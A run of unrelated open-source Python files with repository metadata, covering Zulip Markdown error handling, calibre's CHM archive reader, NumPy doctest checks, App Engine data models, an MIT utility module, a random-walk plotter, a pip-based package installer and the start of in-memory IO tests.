return timeout(5, _md_engine.convert, content)
except:
from zerver.lib.actions import internal_send_message
cleaned = _sanitize_for_log(content)
# Output error to log as well as sending a zulip and email
log_bugdown_error('Exception in Markdown parser: %sInput (sanitized) was: %s'
% (traceback.format_exc(), cleaned))
subject = "Markdown parser failure on %s" % (platform.node(),)
if settings.ERROR_BOT is not None:
internal_send_message(settings.ERROR_BOT, "stream",
"errors", subject, "Markdown parser failed, email sent with details.")
mail.mail_admins(subject, "Failed message: %s\n\n%s\n\n" % (
cleaned, traceback.format_exc()),
fail_silently=False)
raise BugdownRenderingException()
finally:
current_message = None
db_data = None
bugdown_time_start = 0.0
bugdown_total_time = 0.0
bugdown_total_requests = 0
def get_bugdown_time():
# type: () -> float
return bugdown_total_time
def get_bugdown_requests():
# type: () -> int
return bugdown_total_requests
def bugdown_stats_start():
# type: () -> None
global bugdown_time_start
bugdown_time_start = time.time()
def bugdown_stats_finish():
# type: () -> None
global bugdown_total_time
global bugdown_total_requests
global bugdown_time_start
bugdown_total_requests += 1
bugdown_total_time += (time.time() - bugdown_time_start)
def convert(content, realm_domain=None, message=None, possible_words=None):
# type: (Text, Optional[Text], Optional[Message], Optional[Set[Text]]) -> Optional[Text]
bugdown_stats_start()
ret = do_convert(content, realm_domain, message, possible_words)
bugdown_stats_finish()
return ret
|
peguin40/zulip
|
zerver/lib/bugdown/__init__.py
|
Python
|
apache-2.0
| 54,643
|
# Copyright (C) 2003-2006 Rubens Ramos <rubensr@users.sourceforge.net>
# Based on code by:
# Copyright (C) 2003 Razvan Cojocaru <razvanco@gmx.net>
# pychm is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
# $Id: chm.py,v 1.12 2006/08/07 12:31:51 rubensr Exp $
'''
chm - A high-level front end for the chmlib python module.
The chm module provides high level access to the functionality
included in chmlib. It encapsulates functions in the CHMFile class, and
provides some additional features, such as the ability to obtain
the contents tree of a CHM archive.
'''
import array
import string
import sys
import codecs
import calibre.utils.chm.chmlib as chmlib
from calibre.constants import plugins
extra, extra_err = plugins['chm_extra']
if extra_err:
raise RuntimeError('Failed to load chm.extra: '+extra_err)
charset_table = {
0 : 'iso8859_1', # ANSI_CHARSET
238 : 'iso8859_2', # EASTEUROPE_CHARSET
178 : 'iso8859_6', # ARABIC_CHARSET
161 : 'iso8859_7', # GREEK_CHARSET
177 : 'iso8859_8', # HEBREW_CHARSET
162 : 'iso8859_9', # TURKISH_CHARSET
222 : 'iso8859_11', # THAI_CHARSET - hmm not in python 2.2...
186 : 'iso8859_13', # BALTIC_CHARSET
204 : 'cp1251', # RUSSIAN_CHARSET
255 : 'cp437', # OEM_CHARSET
128 : 'cp932', # SHIFTJIS_CHARSET
134 : 'cp936', # GB2312_CHARSET
129 : 'cp949', # HANGUL_CHARSET
136 : 'cp950', # CHINESEBIG5_CHARSET
1 : None, # DEFAULT_CHARSET
2 : None, # SYMBOL_CHARSET
130 : None, # JOHAB_CHARSET
163 : None, # VIETNAMESE_CHARSET
77 : None, # MAC_CHARSET
}
locale_table = {
0x0436 : ('iso8859_1', "Afrikaans", "Western Europe & US"),
0x041c : ('iso8859_2', "Albanian", "Central Europe"),
0x0401 : ('iso8859_6', "Arabic_Saudi_Arabia", "Arabic"),
0x0801 : ('iso8859_6', "Arabic_Iraq", "Arabic"),
0x0c01 : ('iso8859_6', "Arabic_Egypt", "Arabic"),
0x1001 : ('iso8859_6', "Arabic_Libya", "Arabic"),
0x1401 : ('iso8859_6', "Arabic_Algeria", "Arabic"),
0x1801 : ('iso8859_6', "Arabic_Morocco", "Arabic"),
0x1c01 : ('iso8859_6', "Arabic_Tunisia", "Arabic"),
0x2001 : ('iso8859_6', "Arabic_Oman", "Arabic"),
0x2401 : ('iso8859_6', "Arabic_Yemen", "Arabic"),
0x2801 : ('iso8859_6', "Arabic_Syria", "Arabic"),
0x2c01 : ('iso8859_6', "Arabic_Jordan", "Arabic"),
0x3001 : ('iso8859_6', "Arabic_Lebanon", "Arabic"),
0x3401 : ('iso8859_6', "Arabic_Kuwait", "Arabic"),
0x3801 : ('iso8859_6', "Arabic_UAE", "Arabic"),
0x3c01 : ('iso8859_6', "Arabic_Bahrain", "Arabic"),
0x4001 : ('iso8859_6', "Arabic_Qatar", "Arabic"),
0x042b : (None, "Armenian","Armenian"),
0x042c : ('iso8859_9', "Azeri_Latin", "Turkish"),
0x082c : ('cp1251', "Azeri_Cyrillic", "Cyrillic"),
0x042d : ('iso8859_1', "Basque", "Western Europe & US"),
0x0423 : ('cp1251', "Belarusian", "Cyrillic"),
0x0402 : ('cp1251', "Bulgarian", "Cyrillic"),
0x0403 : ('iso8859_1', "Catalan", "Western Europe & US"),
0x0404 : ('cp950', "Chinese_Taiwan", "Traditional Chinese"),
0x0804 : ('cp936', "Chinese_PRC", "Simplified Chinese"),
0x0c04 : ('cp950', "Chinese_Hong_Kong", "Traditional Chinese"),
0x1004 : ('cp936', "Chinese_Singapore", "Simplified Chinese"),
0x1404 : ('cp950', "Chinese_Macau", "Traditional Chinese"),
0x041a : ('iso8859_2', "Croatian", "Central Europe"),
0x0405 : ('iso8859_2', "Czech", "Central Europe"),
0x0406 : ('iso8859_1', "Danish", "Western Europe & US"),
0x0413 : ('iso8859_1', "Dutch_Standard", "Western Europe & US"),
0x0813 : ('iso8859_1', "Dutch_Belgian", "Western Europe & US"),
0x0409 : ('iso8859_1', "English_United_States", "Western Europe & US"),
0x0809 : ('iso8859_1', "English_United_Kingdom", "Western Europe & US"),
0x0c09 : ('iso8859_1', "English_Australian", "Western Europe & US"),
0x1009 : ('iso8859_1', "English_Canadian", "Western Europe & US"),
0x1409 : ('iso8859_1', "English_New_Zealand", "Western Europe & US"),
0x1809 : ('iso8859_1', "English_Irish", "Western Europe & US"),
0x1c09 : ('iso8859_1', "English_South_Africa", "Western Europe & US"),
0x2009 : ('iso8859_1', "English_Jamaica", "Western Europe & US"),
0x2409 : ('iso8859_1', "English_Caribbean", "Western Europe & US"),
0x2809 : ('iso8859_1', "English_Belize", "Western Europe & US"),
0x2c09 : ('iso8859_1', "English_Trinidad", "Western Europe & US"),
0x3009 : ('iso8859_1', "English_Zimbabwe", "Western Europe & US"),
0x3409 : ('iso8859_1', "English_Philippines", "Western Europe & US"),
0x0425 : ('iso8859_13',"Estonian", "Baltic",),
0x0438 : ('iso8859_1', "Faeroese", "Western Europe & US"),
0x0429 : ('iso8859_6', "Farsi", "Arabic"),
0x040b : ('iso8859_1', "Finnish", "Western Europe & US"),
0x040c : ('iso8859_1', "French_Standard", "Western Europe & US"),
0x080c : ('iso8859_1', "French_Belgian", "Western Europe & US"),
0x0c0c : ('iso8859_1', "French_Canadian", "Western Europe & US"),
0x100c : ('iso8859_1', "French_Swiss", "Western Europe & US"),
0x140c : ('iso8859_1', "French_Luxembourg", "Western Europe & US"),
0x180c : ('iso8859_1', "French_Monaco", "Western Europe & US"),
0x0437 : (None, "Georgian", "Georgian"),
0x0407 : ('iso8859_1', "German_Standard", "Western Europe & US"),
0x0807 : ('iso8859_1', "German_Swiss", "Western Europe & US"),
0x0c07 : ('iso8859_1', "German_Austrian", "Western Europe & US"),
0x1007 : ('iso8859_1', "German_Luxembourg", "Western Europe & US"),
0x1407 : ('iso8859_1', "German_Liechtenstein", "Western Europe & US"),
0x0408 : ('iso8859_7', "Greek", "Greek"),
0x040d : ('iso8859_8', "Hebrew", "Hebrew"),
0x0439 : (None, "Hindi", "Indic"),
0x040e : ('iso8859_2', "Hungarian", "Central Europe"),
0x040f : ('iso8859_1', "Icelandic", "Western Europe & US"),
0x0421 : ('iso8859_1', "Indonesian", "Western Europe & US"),
0x0410 : ('iso8859_1', "Italian_Standard", "Western Europe & US"),
0x0810 : ('iso8859_1', "Italian_Swiss", "Western Europe & US"),
0x0411 : ('cp932', "Japanese", "Japanese"),
0x043f : ('cp1251', "Kazakh", "Cyrillic"),
0x0457 : (None, "Konkani", "Indic"),
0x0412 : ('cp949', "Korean", "Korean"),
0x0426 : ('iso8859_13',"Latvian", "Baltic",),
0x0427 : ('iso8859_13',"Lithuanian", "Baltic",),
0x042f : ('cp1251', "Macedonian", "Cyrillic"),
0x043e : ('iso8859_1', "Malay_Malaysia", "Western Europe & US"),
0x083e : ('iso8859_1', "Malay_Brunei_Darussalam", "Western Europe & US"),
0x044e : (None, "Marathi", "Indic"),
0x0414 : ('iso8859_1', "Norwegian_Bokmal", "Western Europe & US"),
0x0814 : ('iso8859_1', "Norwegian_Nynorsk", "Western Europe & US"),
0x0415 : ('iso8859_2', "Polish", "Central Europe"),
0x0416 : ('iso8859_1', "Portuguese_Brazilian", "Western Europe & US"),
0x0816 : ('iso8859_1', "Portuguese_Standard", "Western Europe & US"),
0x0418 : ('iso8859_2', "Romanian", "Central Europe"),
0x0419 : ('cp1251', "Russian", "Cyrillic"),
0x044f : (None, "Sanskrit", "Indic"),
0x081a : ('iso8859_2', "Serbian_Latin", "Central Europe"),
0x0c1a : ('cp1251', "Serbian_Cyrillic", "Cyrillic"),
0x041b : ('iso8859_2', "Slovak", "Central Europe"),
0x0424 : ('iso8859_2', "Slovenian", "Central Europe"),
0x040a : ('iso8859_1', "Spanish_Trad_Sort", "Western Europe & US"),
0x080a : ('iso8859_1', "Spanish_Mexican", "Western Europe & US"),
0x0c0a : ('iso8859_1', "Spanish_Modern_Sort", "Western Europe & US"),
0x100a : ('iso8859_1', "Spanish_Guatemala", "Western Europe & US"),
0x140a : ('iso8859_1', "Spanish_Costa_Rica", "Western Europe & US"),
0x180a : ('iso8859_1', "Spanish_Panama", "Western Europe & US"),
0x1c0a : ('iso8859_1', "Spanish_Dominican_Repub", "Western Europe & US"),
0x200a : ('iso8859_1', "Spanish_Venezuela", "Western Europe & US"),
0x240a : ('iso8859_1', "Spanish_Colombia", "Western Europe & US"),
0x280a : ('iso8859_1', "Spanish_Peru", "Western Europe & US"),
0x2c0a : ('iso8859_1', "Spanish_Argentina", "Western Europe & US"),
0x300a : ('iso8859_1', "Spanish_Ecuador", "Western Europe & US"),
0x340a : ('iso8859_1', "Spanish_Chile", "Western Europe & US"),
0x380a : ('iso8859_1', "Spanish_Uruguay", "Western Europe & US"),
0x3c0a : ('iso8859_1', "Spanish_Paraguay", "Western Europe & US"),
0x400a : ('iso8859_1', "Spanish_Bolivia", "Western Europe & US"),
0x440a : ('iso8859_1', "Spanish_El_Salvador", "Western Europe & US"),
0x480a : ('iso8859_1', "Spanish_Honduras", "Western Europe & US"),
0x4c0a : ('iso8859_1', "Spanish_Nicaragua", "Western Europe & US"),
0x500a : ('iso8859_1', "Spanish_Puerto_Rico", "Western Europe & US"),
0x0441 : ('iso8859_1', "Swahili", "Western Europe & US"),
0x041d : ('iso8859_1', "Swedish", "Western Europe & US"),
0x081d : ('iso8859_1', "Swedish_Finland", "Western Europe & US"),
0x0449 : (None, "Tamil", "Indic"),
0x0444 : ('cp1251', "Tatar", "Cyrillic"),
0x041e : ('iso8859_11',"Thai", "Thai"),
0x041f : ('iso8859_9', "Turkish", "Turkish"),
0x0422 : ('cp1251', "Ukrainian", "Cyrillic"),
0x0420 : ('iso8859_6', "Urdu", "Arabic"),
0x0443 : ('iso8859_9', "Uzbek_Latin", "Turkish"),
0x0843 : ('cp1251', "Uzbek_Cyrillic", "Cyrillic"),
0x042a : ('cp1258', "Vietnamese", "Vietnamese")
}
class CHMFile:
"A class to manage access to CHM files."
filename = ""
file = None
title = ""
home = "/"
index = None
topics = None
encoding = None
lcid = None
binaryindex = None
def __init__(self):
self.searchable = 0
def LoadCHM(self, archiveName):
'''Loads a CHM archive.
This function will also call GetArchiveInfo to obtain information
such as the index file name and the topics file. It returns 1 on
success, and 0 if it fails.
'''
if (self.filename is not None):
self.CloseCHM()
self.file = chmlib.chm_open(archiveName)
if (self.file is None):
return 0
self.filename = archiveName
self.GetArchiveInfo()
return 1
def CloseCHM(self):
'''Closes the CHM archive.
This function will close the CHM file, if it is open. All variables
are also reset.
'''
if (self.filename is not None):
chmlib.chm_close(self.file)
self.file = None
self.filename = ''
self.title = ""
self.home = "/"
self.index = None
self.topics = None
self.encoding = None
def GetArchiveInfo(self):
'''Obtains information on CHM archive.
This function checks the /#SYSTEM file inside the CHM archive to
obtain the index, home page, topics, encoding and title. It is called
from LoadCHM.
'''
# extra.is_searchable crashed...
# self.searchable = extra.is_searchable (self.file)
self.searchable = False
self.lcid = None
result, ui = chmlib.chm_resolve_object(self.file, '/#SYSTEM')
if (result != chmlib.CHM_RESOLVE_SUCCESS):
sys.stderr.write('GetArchiveInfo: #SYSTEM does not exist\n')
return 0
size, text = chmlib.chm_retrieve_object(self.file, ui, 4l, ui.length)
if (size == 0):
sys.stderr.write('GetArchiveInfo: file size = 0\n')
return 0
buff = array.array('B', text)
index = 0
while (index < size):
cursor = buff[index] + (buff[index+1] * 256)
if (cursor == 0):
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
self.topics = '/' + text[index:index+cursor-1]
elif (cursor == 1):
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
self.index = '/' + text[index:index+cursor-1]
elif (cursor == 2):
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
self.home = '/' + text[index:index+cursor-1]
elif (cursor == 3):
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
self.title = text[index:index+cursor-1]
elif (cursor == 4):
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
self.lcid = buff[index] + (buff[index+1] * 256)
elif (cursor == 6):
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
tmp = text[index:index+cursor-1]
if not self.topics:
tmp1 = '/' + tmp + '.hhc'
tmp2 = '/' + tmp + '.hhk'
res1, ui1 = chmlib.chm_resolve_object(self.file, tmp1)
res2, ui2 = chmlib.chm_resolve_object(self.file, tmp2)
if (not self.topics) and \
(res1 == chmlib.CHM_RESOLVE_SUCCESS):
self.topics = '/' + tmp + '.hhc'
if (not self.index) and \
(res2 == chmlib.CHM_RESOLVE_SUCCESS):
self.index = '/' + tmp + '.hhk'
elif (cursor == 16):
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
self.encoding = text[index:index+cursor-1]
else:
index += 2
cursor = buff[index] + (buff[index+1] * 256)
index += 2
index += cursor
self.GetWindowsInfo()
if not self.lcid:
self.lcid = extra.get_lcid(self.file)
return 1
def GetTopicsTree(self):
'''Reads and returns the topics tree.
This auxiliary function reads and returns the topics tree file
contents for the CHM archive.
'''
if (self.topics is None):
return None
if self.topics:
res, ui = chmlib.chm_resolve_object(self.file, self.topics)
if (res != chmlib.CHM_RESOLVE_SUCCESS):
return None
size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, ui.length)
if (size == 0):
sys.stderr.write('GetTopicsTree: file size = 0\n')
return None
return text
def GetIndex(self):
'''Reads and returns the index tree.
This auxiliary function reads and returns the index tree file
contents for the CHM archive.
'''
if (self.index is None):
return None
if self.index:
res, ui = chmlib.chm_resolve_object(self.file, self.index)
if (res != chmlib.CHM_RESOLVE_SUCCESS):
return None
size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, ui.length)
if (size == 0):
sys.stderr.write('GetIndex: file size = 0\n')
return None
return text
def ResolveObject(self, document):
'''Tries to locate a document in the archive.
This function tries to locate the document inside the archive. It
returns a tuple where the first element is zero if the function
was successful, and the second is the UnitInfo for that document.
The UnitInfo is used to retrieve the document contents
'''
if self.file:
# path = os.path.abspath(document)
path = document
return chmlib.chm_resolve_object(self.file, path)
else:
return (1, None)
def RetrieveObject(self, ui, start=-1, length=-1):
'''Retrieves the contents of a document.
This function takes a UnitInfo and two optional arguments, the first
being the start address and the second is the length. These define
the amount of data to be read from the archive.
'''
if self.file and ui:
if length == -1:
len = ui.length
else:
len = length
if start == -1:
st = 0l
else:
st = long(start)
return chmlib.chm_retrieve_object(self.file, ui, st, len)
else:
return (0, '')
def Search(self, text, wholewords=0, titleonly=0):
'''Performs full-text search on the archive.
The first parameter is the word to look for, the second
indicates if the search should be for whole words only, and
the third parameter indicates if the search should be
restricted to page titles.
This method will return a tuple, the first item
indicating if the search results were partial, and the second
item being a dictionary containing the results.'''
if text and text != '' and self.file:
return extra.search(self.file, text, wholewords,
titleonly)
else:
return None
def IsSearchable(self):
'''Indicates if the full-text search is available for this
archive - this flag is updated when GetArchiveInfo is called'''
return self.searchable
def GetEncoding(self):
'''Returns a string that can be used with the codecs python package
to encode or decode the files in the chm archive. If an error is
found, or if it is not possible to find the encoding, None is
returned.'''
if self.encoding:
vals = string.split(self.encoding, ',')
if len(vals) > 2:
try:
return charset_table[int(vals[2])]
except KeyError:
pass
return None
def GetLCID(self):
'''Returns the archive Locale ID'''
if self.lcid in locale_table:
return locale_table[self.lcid]
else:
return None
def get_encoding(self):
ans = self.GetEncoding()
if ans is None:
lcid = self.GetLCID()
if lcid is not None:
ans = lcid[0]
if ans:
try:
codecs.lookup(ans)
except:
ans = None
return ans
def GetDWORD(self, buff, idx=0):
'''Internal method.
Reads a double word (4 bytes) from a buffer.
'''
result = buff[idx] + (buff[idx+1]<<8) + (buff[idx+2]<<16) + \
(buff[idx+3]<<24)
if result == 0xFFFFFFFF:
result = 0
return result
def GetString(self, text, idx):
'''Internal method.
Retrieves a string from the #STRINGS buffer.
'''
next = string.find(text, '\x00', idx)
chunk = text[idx:next]
return chunk
def GetWindowsInfo(self):
'''Gets information from the #WINDOWS file.
Checks the #WINDOWS file to see if it has any info that was
not found in #SYSTEM (topics, index or default page.
'''
result, ui = chmlib.chm_resolve_object(self.file, '/#WINDOWS')
if (result != chmlib.CHM_RESOLVE_SUCCESS):
return -1
size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, 8)
if (size < 8):
return -2
buff = array.array('B', text)
num_entries = self.GetDWORD(buff, 0)
entry_size = self.GetDWORD(buff, 4)
if num_entries < 1:
return -3
size, text = chmlib.chm_retrieve_object(self.file, ui, 8l, entry_size)
if (size < entry_size):
return -4
buff = array.array('B', text)
toc_index = self.GetDWORD(buff, 0x60)
idx_index = self.GetDWORD(buff, 0x64)
dft_index = self.GetDWORD(buff, 0x68)
result, ui = chmlib.chm_resolve_object(self.file, '/#STRINGS')
if (result != chmlib.CHM_RESOLVE_SUCCESS):
return -5
size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, ui.length)
if (size == 0):
return -6
if (not self.topics):
self.topics = self.GetString(text, toc_index)
if not self.topics.startswith("/"):
self.topics = "/" + self.topics
if (not self.index):
self.index = self.GetString(text, idx_index)
if not self.index.startswith("/"):
self.index = "/" + self.index
if (dft_index != 0):
self.home = self.GetString(text, dft_index)
if not self.home.startswith("/"):
self.home = "/" + self.home
|
jelly/calibre
|
src/calibre/utils/chm/chm.py
|
Python
|
gpl-3.0
| 21,378
|
""" Doctests for NumPy-specific nose/doctest modifications
"""
#FIXME: None of these tests is run, because 'check' is not a recognized
# testing prefix.
# try the #random directive on the output line
def check_random_directive():
'''
>>> 2+2
<BadExample object at 0x084D05AC> #random: may vary on your system
'''
# check the implicit "import numpy as np"
def check_implicit_np():
'''
>>> np.array([1,2,3])
array([1, 2, 3])
'''
# there's some extraneous whitespace around the correct responses
def check_whitespace_enabled():
'''
# whitespace after the 3
>>> 1+2
3
# whitespace before the 7
>>> 3+4
7
'''
def check_empty_output():
""" Check that no output does not cause an error.
This is related to nose bug 445; the numpy plugin changed the
doctest-result-variable default and therefore hit this bug:
http://code.google.com/p/python-nose/issues/detail?id=445
>>> a = 10
"""
def check_skip():
""" Check skip directive
The test below should not run
>>> 1/0 #doctest: +SKIP
"""
if __name__ == '__main__':
# Run tests outside numpy test rig
import nose
from numpy.testing.noseclasses import NumpyDoctest
argv = ['', __file__, '--with-numpydoctest']
nose.core.TestProgram(argv=argv, addplugins=[NumpyDoctest()])
|
anntzer/numpy
|
numpy/testing/tests/test_doctesting.py
|
Python
|
bsd-3-clause
| 1,347
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from google.appengine.ext import ndb
import logging
class Usuario(ndb.Model):
autor = ndb.StringProperty()
rol = ndb.StringProperty()
area = ndb.StringProperty()
date = ndb.DateTimeProperty(auto_now_add=True)
def get_usuario(cls, keyusuario):
result = None
if keyusuario:
q = cls.query().filter(Usuario._key == keyusuario).fetch(1)
for element in q:
result = element
return result
def get_autor(cls, autor):
result = None
if autor:
q = cls.query().filter(ndb.GenericProperty('autor') == autor).fetch(1)
for element in q:
result = element
return result
class Problema(ndb.Model):
titulo = ndb.StringProperty()
detalle = ndb.StringProperty()
vigencia = ndb.StringProperty()
votos_count= ndb.IntegerProperty(default=0)
resp_count = ndb.IntegerProperty(default=0)
keyUsuario = ndb.KeyProperty(kind=Usuario)
time = ndb.DateTimeProperty(auto_now_add=True)
def get_Problemakey(cls, Problemakey):
result = None
if Problemakey:
q = cls.query().filter(Usuario._key == Problemakey).fetch(1)
for element in q:
result = element
return result
def get_Problemas(cls):
result = {}
usu = Usuario()
q = cls.query()
logging.info('q: %s', q)
i = 0
for e in q:
usu = usu.get_usuario(e.keyUsuario)
#validar si se ha creado bien el diccionario
element = {'titulo': e.titulo,
'detalle':e.detalle,
'votos_count': e.votos_count,
'resp_count': e.resp_count,
'autor': usu.autor,
'area':usu.area,
'time':e.time.strftime("%d/%m/%y %H:%M:%S"),
'vigencia': e.vigencia,
'id': e.key.urlsafe()}
result['element' + str(i)] = element
i = i + 1
logging.info('result: %s', result)
return result
class Respuesta(ndb.Model):
detalle = ndb.StringProperty()
fecha_creacion = ndb.DateTimeProperty(auto_now_add=True)
keyProblema = ndb.KeyProperty(kind=Problema)
keyUsuario = ndb.KeyProperty(kind=Usuario)
def get_respuestas(cls, keyProblema):
result = None
if keyProblema:
q = Respuesta.query().filter(ndb.GenericProperty('keyProblema') == keyProblema).fetch(50)
result = q
logging.info('into get_respuestas : %s', result)
return result
class Votacion(ndb.Model):
ticket = ndb.StringProperty()
keyPropuesta = ndb.KeyProperty(kind=Respuesta)
keyProblema = ndb.KeyProperty(kind=Problema)
UsuarioGanador = ndb.StringProperty()
UsuarioBenefactor = ndb.StringProperty()
nombre_premio = ndb.StringProperty(default='cafe')
valor = ndb.FloatProperty(default=5.0)
proveedor = ndb.StringProperty(default='Degussi')
vigencia = ndb.IntegerProperty(default=5)
def get_ganadores(cls):
q = Votacion.query().filter().fetch(50, projection = [Votacion.ticket, Votacion.UsuarioGanador,
Votacion.UsuarioBenefactor, Votacion.nombre_premio,
Votacion.valor, Votacion.proveedor, Votacion.vigencia])
return q
|
jrevatta/daleuncafe
|
dcmodel.py
|
Python
|
apache-2.0
| 3,541
|
"""Useful methods and constants"""
import os
import telnetlib
import config
GL_GENERAL = "420226"
GL_MEETING_FOOD = "421000"
WORKER_PORT = 45451
IGNORE_HEADER = "X-Rfpme-Ignore"
def filename(id, ext):
"""
Identifies the file with the given receipt ID and extension.
"""
if isinstance(id, str):
id = int(id)
fn = "%04d.%s" % (id, ext)
return os.path.join(config.STORE, fn)
def format_amount(cents):
"""
Turns an amount in cents into a string in xxxx.xx format.
"""
return "%d.%02d" % (cents / 100, cents % 100)
def moira_members_of_type(lst, t):
"""
Lists the members of a Moira list of a given type. Returns None on
error.
"""
import moira
moira.connect()
try:
members = moira.query("get_members_of_list", lst)
return [m["member_name"] for m in members if m["member_type"] == t]
except moira.MoiraException:
return None
def ldap_full_name(username):
"""
Looks up a user's full name (CN) in LDAP, searching by username.
"""
import ldap
BASE = "ou=users,ou=moira,dc=mit,dc=edu"
l = ldap.open("ldap-too.mit.edu")
query = "(uid=%s)" % username
res = l.search_s(BASE, ldap.SCOPE_SUBTREE, query, ["cn"])
if len(res) != 1:
raise NameError("Could not uniquely match username %s in LDAP" %
username)
attrs = res[0][1]
return attrs["cn"][0]
def worker_exec(cmd):
"""
Executes cmd on the worker. Raises RemoteError on failure.
"""
tn = telnetlib.Telnet(config.WORKER, WORKER_PORT)
tn.write(cmd)
response = tn.read_all().strip()
tn.close()
if response != "OK":
raise RemoteError(response)
class RemoteError(Exception):
pass
class IgnoreError(Exception):
pass
|
btidor/rfpme
|
util.py
|
Python
|
mit
| 1,793
|
def random_walk_2D(np, ns, plot_step):
xpositions = numpy.zeros(np)
ypositions = numpy.zeros(np)
# extent of the axis in the plot:
xymax = 3*numpy.sqrt(ns); xymin = -xymax
NORTH = 1; SOUTH = 2; WEST = 3; EAST = 4 # constants
for step in range(ns):
for i in range(np):
direction = random.randint(1, 4)
if direction == NORTH:
ypositions[i] += 1
elif direction == SOUTH:
ypositions[i] -= 1
elif direction == EAST:
xpositions[i] += 1
elif direction == WEST:
xpositions[i] -= 1
# Plot just every plot_step steps
if (step+1) % plot_step == 0:
plot(xpositions, ypositions, 'ko',
axis=[xymin, xymax, xymin, xymax],
title='%d particles after %d steps' %
(np, step+1),
savefig='tmp_%03d.eps' % (step+1))
return xpositions, ypositions
# main program:
import random
random.seed(10)
import sys
import numpy
from scitools.std import plot
np = int(sys.argv[1]) # number of particles
ns = int(sys.argv[2]) # number of steps
plot_step = int(sys.argv[3]) # plot every plot_step steps
x, y = random_walk_2D(np, ns, plot_step)
|
qilicun/python
|
python3/src/random/walk2D.py
|
Python
|
gpl-3.0
| 1,296
|
import os
import logging
import subprocess
from urllib.request import urlopen
logger = logging.getLogger('vampire')
class Umask(object):
"""
Change umask.
"""
def __init__(self, mask):
self.mask = mask
def __enter__(self):
self.origin = os.umask(self.mask)
def __exit__(self, exc_type, exc_val, exc_tb):
os.umask(self.origin)
class PythonPackages(object):
"""
Class abstracting Python
packages.
"""
def __init__(self, build, packages=None, requirements=None):
"""
Set the constants.
"""
self.build = build
# argparse sets None if not given. Can't iterate over that later,
# so set to empty list
if packages and type(packages) == list:
self.packages = packages
else:
self.packages = list()
self.requirements = requirements
if self.requirements:
self.requirements = os.path.abspath(self.requirements)
if not os.access(self.requirements, os.R_OK):
raise RuntimeError("pip requirements file %s unreadable" % self.requirements)
self.python_executable = os.path.join(self.build.target, 'bin/python')
if not self.build.is_three:
self.ez_url = 'https://bootstrap.pypa.io/ez_setup.py'
self.ez_path = os.path.join(self.build.temporary_directory, 'ez_setup.py')
self.ez_executable = os.path.join(os.path.dirname(self.python_executable), 'easy_install')
if self.build.is_three:
self.pip_executable = os.path.join(os.path.dirname(self.python_executable), 'pip3')
else:
self.pip_executable = os.path.join(os.path.dirname(self.python_executable), 'pip')
def __call__(self):
"""
Run the methods.
"""
if not self.build.is_three:
self.pip()
self.install()
def pip(self):
"""
Get and install pip.
"""
logger.info('Installing pip...')
download = urlopen(self.ez_url)
with Umask(0o0077):
with open(self.ez_path, 'wb') as f:
f.write(download.read())
ez_process = subprocess.Popen([self.python_executable, self.ez_path])
ez_process.wait()
if ez_process.returncode != 0:
ez_process.communicate()
raise RuntimeError('Easy install exited with status %s' % ez_process.returncode)
pip_process = subprocess.Popen([self.ez_executable, 'pip'])
pip_process.wait()
if pip_process.returncode != 0:
pip_process.communicate()
raise RuntimeError('Pip install exited with status %s' % pip_process.returncode)
os.remove(self.ez_path)
logger.info('...done.')
def install(self):
"""
Pip install the packages.
"""
for package in self.packages:
logger.info('Installing %s...' % package)
process = subprocess.Popen([self.pip_executable, 'install', package])
process.wait()
if process.returncode != 0:
process.communicate()
raise RuntimeError('Package install exited with status %s' % process.returncode)
logger.info('...done.')
if self.requirements:
logger.info('Installing from %s...' % self.requirements)
process = subprocess.Popen([self.pip_executable, 'install', '-r', self.requirements])
process.wait()
if process.returncode != 0:
process.communicate()
raise RuntimeError('Package install exited with status %s' % process.returncode)
logger.info('...done.')
|
joedborg/vampire
|
vampire/packages.py
|
Python
|
gpl-2.0
| 3,718
|
"""Unit tests for memory-based file-like objects.
StringIO -- for unicode strings
BytesIO -- for bytes
"""
from __future__ import unicode_literals
from __future__ import print_function
import unittest
from test import test_support as support
import io
import _pyio as pyio
import pickle
class MemorySeekTestMixin:
def testInit(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
def testRead(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEqual(buf[:1], bytesIo.read(1))
self.assertEqual(buf[1:5], bytesIo.read(4))
self.assertEqual(buf[5:], bytesIo.read(900))
self.assertEqual(self.EOF, bytesIo.read())
def testReadNoArgs(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEqual(buf, bytesIo.read())
self.assertEqual(self.EOF, bytesIo.read())
def testSeek(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
bytesIo.read(5)
bytesIo.seek(0)
self.assertEqual(buf, bytesIo.read())
bytesIo.seek(3)
self.assertEqual(buf[3:], bytesIo.read())
self.assertRaises(TypeError, bytesIo.seek, 0.0)
def testTell(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEqual(0, bytesIo.tell())
bytesIo.seek(5)
self.assertEqual(5, bytesIo.tell())
bytesIo.seek(10000)
self.assertEqual(10000, bytesIo.tell())
class MemoryTestMixin:
def test_detach(self):
buf = self.ioclass()
self.assertRaises(self.UnsupportedOperation, buf.detach)
def write_ops(self, f, t):
self.assertEqual(f.write(t("blah.")), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(t("Hello.")), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(5), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(t(" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(t("h")), 1)
self.assertEqual(f.truncate(12), 12)
